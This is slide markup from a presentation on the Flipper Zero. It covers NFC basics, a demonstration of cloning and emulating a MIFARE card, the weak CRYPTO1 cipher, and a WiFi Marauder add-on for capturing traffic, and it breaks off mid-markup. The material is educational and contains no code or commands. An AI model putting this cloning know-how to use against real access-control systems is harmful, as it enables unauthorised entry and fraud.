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f4ab8ba67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0f4ab8ba67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f4ab8ba67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f4ab8ba67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Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>What is it?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latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>NFC means near Field Communication. NFC is a technology that involves transmitting high frequency signals usually in the order of units to 10s of megaHertz. These high-frequency signals diminish in strength significantly with increasing distance. Hence, they are usually reserved for very short but powerful distance transmissions of a maximum of a few centimeters.</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latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>How does it work?</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Flipper zero has a built in 13.56 MHz module which is capable of reading, saving, or even emulating NFC cards. By reading, I mean that Flipper zero can access the identification information stored on an NFC card. By saving, I mean that Flipper zero can copy and store this information. By emulating, I mean that Flipper zero can use the stored information to act like the NFC card.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mon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b5072621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1b5072621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Roboto Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>The picture shown at the bottom of this slide shows the inside of the MIFARE card that we will be cloning in the demonstration.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>There is an antenna wrapped around the outside of the card and a integrated circuit that contains the 1KB of memory.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Some versions of the MIFARE standard allow for symmetric key encryption using the proprietary CRYPTO1 cipher which is an insecure cipher.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mon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59d6226b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59d6226b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Now, let’s consider a few applications of NFC technology:</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Along with the card that was just shown, I will also be cloning a NFC tag as seen in the top right of the slide.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>NFC tokens like these are widely used for Access control in many areas like public transport, car parking, rewards programs, campus and employee ID cards.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>London public transport Oyster Card attacks </a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mon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a1c794f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a1c794f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Roboto Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>The  MIFARE card is cloned by the Flipper Zero first requesting the data from the token and then the MIFARE replies with the contents of the NFC token.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>The card is passive, so the energy in the request is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>more than enough to power the card to send a response</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Once the card has been copied to the Flipper Zero we are able to emulate an exact copy of the MIFARE card.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mon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a1c794f5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a1c794f5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Roboto Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Once the MIFARE card has been cloned we will have an exact copy on the Flipper Zero to interact with similar Access Control systems that the original card was </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>intended</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> for.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mon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0f4ab8ba67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0f4ab8ba67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13ff562b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13ff562b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Roboto Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>WiFi can be added to the Flipper by building a module and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>connecting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> with serial through the GPIO</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>The module at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>its</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> core is a ESP32 system on a chip (SoC)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>These SoCs are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>popular</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> IoT chips and have a wide range of applications and use Espressif’s own development framework that is based on C</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>The SoCs are usually sold on a breakout board, </a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Breakout boards extend the VERY small pins (Surface Mount Device (SMD) size) on the SoC to more useable (and prototypable) pins</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Breakout boards also manage power delivery and other sub circuits that the SoC needs.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>The ESP32 SoC runs the Marauder firmware, which is different than the Flipper Zero firmware</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mon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110f225c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110f225c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16b856565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16b856565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Roboto Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>SD card board is used for saving pcap files because we cannot directly save to the SD card on the Flipper Zero</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>ESP32 is the hardware that the marauder is hosted on, it </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>contains</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> the network interface and processes all of the WiFi traffic on it’s dualcore 160-240 MHz 32-bit processor</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>(OPTIONAL) An external antenna is optional because the ESP32 has a PCB antenna, but it is limited in range so an external modular antenna will get better reception.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>The Flipper Zero is controller for the ESP32, and it also provides a GUI for sending commands and reading </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>truncated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> WiFi traffic (truncated b/c of the limited screen size of the Flipper)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mon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0080dd6e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0080dd6e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8167de7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18167de7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We have discussed and demonstrated some Flipper zero applications. However, Flipper zero has some other hardware features that make it useful for other applications.</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298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>It has a 125KHz RFID module which overlaps the NFC module. RFID means Radio Frequency Identification. This technology is similar to NFC. The only difference is that RFID uses much lower wireless transmission frequencies which can work on longer distance ranges but are less powerful. RFID is used in some key fobs and wrist bands.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Flipper Zero can also be used as an Infrared transceiver. This means it is able to both receive and transmit Infrared signals. With this feature, one thing you can do is use Flipper zero as a remote control. In a similar way you can use Flipper Zero for Bluetooth connections. </a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Beyond wireless transmission, Flipper zero has a built in 1-Wire connector which enables it to both read, write to, and emulate iButton contact keys. Although Flipper zero has some memory in it, it has a MicroSD Card slot which allows memory expansion. Despite all these features, Flipper Zero is able to communicate with other Flipper zero devices using a 433 MHz frequency.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mon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0073e40c4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0073e40c4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0f4ab8ba67_2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0f4ab8ba67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0f4ab8ba67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0f4ab8ba67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016d3c3de2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016d3c3de2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10f225cb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10f225c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Roboto Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>The Flipper Zero is an open-source handheld device packed with features for interacting with access control systems through radio protocols as well as debugging hardware and being extensible through the GPIO pins.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>By open-source, we mean that everything from the firmware to the PCB schematics are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>publicly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> available on their website or GitHub.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
